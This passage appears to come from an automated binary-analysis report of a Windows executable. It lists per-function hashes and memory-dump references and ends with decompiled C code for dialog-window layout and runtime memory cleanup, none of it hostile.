                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction ID: 57930e1635f94cefaec952225fbdf132ea103d396c64fd50df624f9627a1f0c4
                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction Fuzzy Hash: 65C1E7762050A74ADF2D463AC93457EFFA06AA17B172A076DD8B3CB1D0FE20C665D620
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC0548, Relevance: .3, Instructions: 341COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction ID: 6220abbb046730a9b87f5ff0eb6af5ec3c9c67f5c56ce2c0d1ce60da0f54c589
                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction Fuzzy Hash: 69C1F9762051B74ADF2D4639C93463EBFA16EA17B132A076DD8B2CB1C0FE20C664D620
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBFCDE, Relevance: .3, Instructions: 331COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction ID: 5c37cd96678521c8783a29207e70af45cc6b924b0552ce35c6b4280a052f8cb5
                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction Fuzzy Hash: 89C1D4762050B70ADF2D4639C9305BEBFA06AA27B171A077DD8B3CB2C5FE10C665D620
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBF8C6, Relevance: .3, Instructions: 323COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction ID: 382a80c8a5c18249352a11c6fc3950f708a8ab1b19699663be96cffd6a4ab2b4
                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction Fuzzy Hash: 85C1B8762051670ADF2D4639C9341BEFFA15AA17B171A077DD8B3CB2C4FE10C666D620
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CADF12, Relevance: .3, Instructions: 318COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c96746ea0f176fed4e5a1b9d8bffb7b8d71bc780481aa0f821fccaa8eae43c00
                • Instruction ID: cc5581de42250b085a792909345589ec4fd54a9f3bac7a50424b3337caf748e9
                • Opcode Fuzzy Hash: c96746ea0f176fed4e5a1b9d8bffb7b8d71bc780481aa0f821fccaa8eae43c00
                • Instruction Fuzzy Hash: C0E138745183808FC308CF29D89096EBBF1BB8A305F89095EF6D58B356C335E915DB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB364E, Relevance: .3, Instructions: 263COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
                • Instruction ID: 90595fe6e1bef2b00336dbbb7e4b3e347922dd4c4ceed10101be8923dd433b37
                • Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
                • Instruction Fuzzy Hash: F69185B020438A9BDB24EF68C895BFE73D4AB90304F10092DF997872C2EB75A745D352
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC3EE9, Relevance: .2, Instructions: 237COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ec59a31856da785e574d03433d32130f24a1eb1e6019f546542304f7f828a930
                • Instruction ID: da7c34f9a3641c9c4bbe40dd198a1e6b51c6217b3888150d51f4a066d3fb6df0
                • Opcode Fuzzy Hash: ec59a31856da785e574d03433d32130f24a1eb1e6019f546542304f7f828a930
                • Instruction Fuzzy Hash: 21618970E4078866DB3C89A8E8B1FBE23A4DB41704F14CD9EF5A3CB1C1D651DF869259
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB397F, Relevance: .2, Instructions: 232COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
                • Instruction ID: 935ab06c96ff54c4b5d31b403f42850b8711bc1f8361a9d3bb516ad483f6e59a
                • Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
                • Instruction Fuzzy Hash: F27134713043868BEB34DE69C8C4BFD7794EBA1308F10492DE9C68B282DB749B85D756
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC3CBA, Relevance: .2, Instructions: 214COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                • Instruction ID: 6e081a8937f8912245b465bab51a110b3f1f15e7663d278921cb317d26646bfd
                • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                • Instruction Fuzzy Hash: 30517920620BC457DB384528F59AFFF7B999B02704F18C90DE8A3CB282C609DF42D356
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CADADD, Relevance: .2, Instructions: 190COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ee4af36f7187510803446bb40eeba4cfdc3d74cafb811cdf68e51ce7345bab5
                • Instruction ID: fb969dab169cf03917fdb4f953fb1d320c63fec8dc144d2faeec5b414fa4668b
                • Opcode Fuzzy Hash: 1ee4af36f7187510803446bb40eeba4cfdc3d74cafb811cdf68e51ce7345bab5
                • Instruction Fuzzy Hash: 37818D921296D49EC70A8F7D38E03F93FA25773345B1D40EAC4D68B6B7C07A4A58D721
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAE510, Relevance: .2, Instructions: 154COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c7b13918ceae80bf36aabe230afbe17a02e500bcfcc59dc32a59514ba731172
                • Instruction ID: fd9b04ba0e43678425caa955a0fea67b21c3766b4c397532ebf9f49d0268c5e8
                • Opcode Fuzzy Hash: 1c7b13918ceae80bf36aabe230afbe17a02e500bcfcc59dc32a59514ba731172
                • Instruction Fuzzy Hash: D15192319083D64EC712CF29919446EBFE1AFAB318F5A489EF4E54B212D130D689DB93
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAF5C5, Relevance: .1, Instructions: 131COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4cd32a9223b40c18bc878fddc33efcfc471fe65d53a76f2e16704cbf8c4be12
                • Instruction ID: b95c88a50d8d30cd716e9d728228e112aeb7f59d07628bd2ce991e558008a8dc
                • Opcode Fuzzy Hash: f4cd32a9223b40c18bc878fddc33efcfc471fe65d53a76f2e16704cbf8c4be12
                • Instruction Fuzzy Hash: B75127B1A083028FC748CF19D49059AF7E1FFC8314F054A2EE899A7740DB34E959CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB33D3, Relevance: .1, Instructions: 112COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
                • Instruction ID: b6b1ef0e5d2e16736a6ce530e0c744c7c5c63f003b05f3f6685b48c0bf0a6537
                • Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
                • Instruction Fuzzy Hash: 7B31D2B16047568FCB24DE28C8512AABFE0FB95304F00492DE8D6D7741C778EA0ACF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA5D7E, Relevance: .1, Instructions: 76COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: be8bba4f2d1450edd612f054d3b46d236997b642819d33a85848d8102564cddb
                • Instruction ID: f9570e093fb46ebe47f600610d9e0d682a7ca0e18cfcb0f8db12653406a36045
                • Opcode Fuzzy Hash: be8bba4f2d1450edd612f054d3b46d236997b642819d33a85848d8102564cddb
                • Instruction Fuzzy Hash: B8219531A211624BCB08DF2DED9067E7761A78630134AC12FEA569F2D1C539EA25D7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAD70B, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00CAD70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				signed int _t104;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				signed int _t185;
				struct HWND__* _t186;
				struct HWND__* _t187;
				void* _t188;
				void* _t191;
				signed int _t192;
				long _t193;
				void* _t200;
				int* _t201;
				struct HWND__* _t202;
				void* _t204;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t213;

				_t202 = __ecx;
				_v2368.bottom = __ecx;
				E00CA3E41( &_v2208, 0x50, L"$%s:", _a8);
				_t207 =  &_v2368 + 0x10;
				E00CB11FA( &_v2208,  &_v2288, 0x50);
				_t96 = E00CC2BB0( &_v2300);
				_t186 = _v8;
				_t155 = 0;
				_v2376 = _t96;
				_t209 =  *0xcdd5f4 - _t155; // 0x63
				if(_t209 <= 0) {
					L8:
					_t156 = E00CACD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t186,  &_v2352);
					GetClientRect(_t186,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t104 = _v2320.bottom;
					_t191 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t204 = _t191 - _v2304;
					_v2368.bottom = _t169 - _t104;
					if(_t156 == 0) {
						L15:
						_t221 = _a12;
						if(_a12 == 0 && E00CACE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t186,  &_v2048);
						}
						L18:
						_t205 = _t204 - GetSystemMetrics(8);
						_t106 = GetWindow(_t186, 5);
						_t187 = _t106;
						_v2368.bottom = _t187;
						if(_t156 == 0) {
							L24:
							return _t106;
						}
						_t157 = 0;
						while(_t187 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t187,  &_v2320);
							_t170 = _v2320.top.left;
							_t192 = 0x64;
							asm("cdq");
							_t193 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xcddfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
							_t106 = GetWindow(_t187, 2);
							_t187 = _t106;
							__eflags = _t187 - _v2384;
							if(_t187 == _v2384) {
								goto L24;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t158 = 0x64;
					asm("cdq");
					_t134 = _v2292 * _v2368.top;
					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
					_v2324 = _t160;
					asm("cdq");
					_t185 = _t134 % _v2352.top;
					_v2352.left = _t134 / _v2352.top + _t204;
					asm("cdq");
					asm("cdq");
					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
					if(_t163 < 0) {
						_t163 = 0;
					}
					if(_t200 < 0) {
						_t200 = 0;
					}
					 *0xcddfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t186,  &_v2368);
					_t156 = _v2393;
					goto L15;
				} else {
					_t201 = 0xcdd154;
					do {
						if( *_t201 > 0) {
							_t9 =  &(_t201[1]); // 0xcd33e0
							_t150 = E00CC5460( &_v2288,  *_t9, _t96);
							_t207 = _t207 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t201[1]); // 0xcd33e0
								if(E00CACF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t201 =  &(_t201[3]);
						_t213 = _t155 -  *0xcdd5f4; // 0x63
					} while (_t213 < 0);
					goto L8;
				}
			}



















































                0x00cad723
                0x00cad72d
                0x00cad731
                0x00cad736
                0x00cad748
                0x00cad752
                0x00cad757
                0x00cad75e
                0x00cad761
                0x00cad765
                0x00cad76b
                0x00cad7c8
                0x00cad7e0
                0x00cad7e8
                0x00cad7ec
                0x00cad7f8
                0x00cad80a
                0x00cad811
                0x00cad815
                0x00cad818
                0x00cad820
                0x00cad826
                0x00cad82c
                0x00cad8cd
                0x00cad8cd
                0x00cad8d5
                0x00cad906
                0x00cad906
                0x00cad90c
                0x00cad917
                0x00cad919
                0x00cad91f
                0x00cad921
                0x00cad927
                0x00cad9d9
                0x00cad9d9
                0x00cad9d9
                0x00cad92d
                0x00cad9c7
                0x00cad934
                0x00cad93a
                0x00000000
                0x00000000
                0x00cad946
                0x00cad950
                0x00cad965
                0x00cad96a
                0x00cad96d
                0x00cad983
                0x00cad98b
                0x00cad98d
                0x00cad98e
                0x00cad996
                0x00cad9a8
                0x00cad9af
                0x00cad9b8
                0x00cad9be
                0x00cad9c0
                0x00cad9c4
                0x00000000
                0x00000000
                0x00cad9c6
                0x00cad9c6
                0x00cad9c6
                0x00000000
                0x00cad9c7
                0x00cad83a
                0x00000000
                0x00000000
                0x00cad847
                0x00cad848
                0x00cad851
                0x00cad856
                0x00cad85c
                0x00cad860
                0x00cad861
                0x00cad867
                0x00cad871
                0x00cad878
                0x00cad881
                0x00cad885
                0x00cad889
                0x00cad88b
                0x00cad88b
                0x00cad88f
                0x00cad891
                0x00cad891
                0x00cad8b7
                0x00cad8c3
                0x00cad8c9
                0x00000000
                0x00cad76d
                0x00cad76d
                0x00cad772
                0x00cad775
                0x00cad778
                0x00cad780
                0x00cad785
                0x00cad78a
                0x00cad79b
                0x00cad7a5
                0x00cad7b2
                0x00cad7b2
                0x00cad7a5
                0x00cad7b8
                0x00cad7b8
                0x00cad7bc
                0x00cad7bd
                0x00cad7c0
                0x00cad7c0
                0x00000000
                0x00cad772

                APIs
                • _swprintf.LIBCMT ref: 00CAD731
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                  • Part of subcall function 00CB11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CE0078,?,00CACE91,00000000,?,00000050,00CE0078), ref: 00CB1217
                • _strlen.LIBCMT ref: 00CAD752
                • SetDlgItemTextW.USER32(?,00CDD154,?), ref: 00CAD7B2
                • GetWindowRect.USER32(?,?), ref: 00CAD7EC
                • GetClientRect.USER32(?,?), ref: 00CAD7F8
                • GetWindowLongW.USER32(?,000000F0), ref: 00CAD896
                • GetWindowRect.USER32(?,?), ref: 00CAD8C3
                • SetWindowTextW.USER32(?,?), ref: 00CAD906
                • GetSystemMetrics.USER32(00000008), ref: 00CAD90E
                • GetWindow.USER32(?,00000005), ref: 00CAD919
                • GetWindowRect.USER32(00000000,?), ref: 00CAD946
                • GetWindow.USER32(00000000,00000002), ref: 00CAD9B8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$d
                • API String ID: 2407758923-2512411981
                • Opcode ID: 41e4d010908098ad1fa6160f29195840d00f8779e44ba54f7908d97da8a3c250
                • Instruction ID: 666e06c3d3676101b098c9acc5166b0c79a854246cf1ba6643b031d77e913947
                • Opcode Fuzzy Hash: 41e4d010908098ad1fa6160f29195840d00f8779e44ba54f7908d97da8a3c250
                • Instruction Fuzzy Hash: 4881B271509302AFD710DFA8DC85F6FBBE9EB89708F04091DFA96D3290D630E9058B52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCB784, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CCB784(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xcddd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00CC7A50(_t46);
							E00CCB363( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00CC7A50(_t47);
							E00CCB461( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00CC7A50( *((intOrPtr*)(_t74 + 0x7c)));
						E00CC7A50( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00CC7A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00CC7A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00CC7A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00CC7A50( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00CCB8F7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xcdd818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00CC7A50(_t31);
							E00CC7A50( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00CC7A50(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00CC7A50(_t74);
			}















                0x00ccb78c
                0x00ccb790
                0x00ccb798
                0x00ccb7a1
                0x00ccb7a6
                0x00ccb7ad
                0x00ccb7b5
                0x00ccb7bd
                0x00ccb7c8
                0x00ccb7ce
                0x00ccb7cf
                0x00ccb7d7
                0x00ccb7df
                0x00ccb7ea
                0x00ccb7f0
                0x00ccb7f4
                0x00ccb7ff
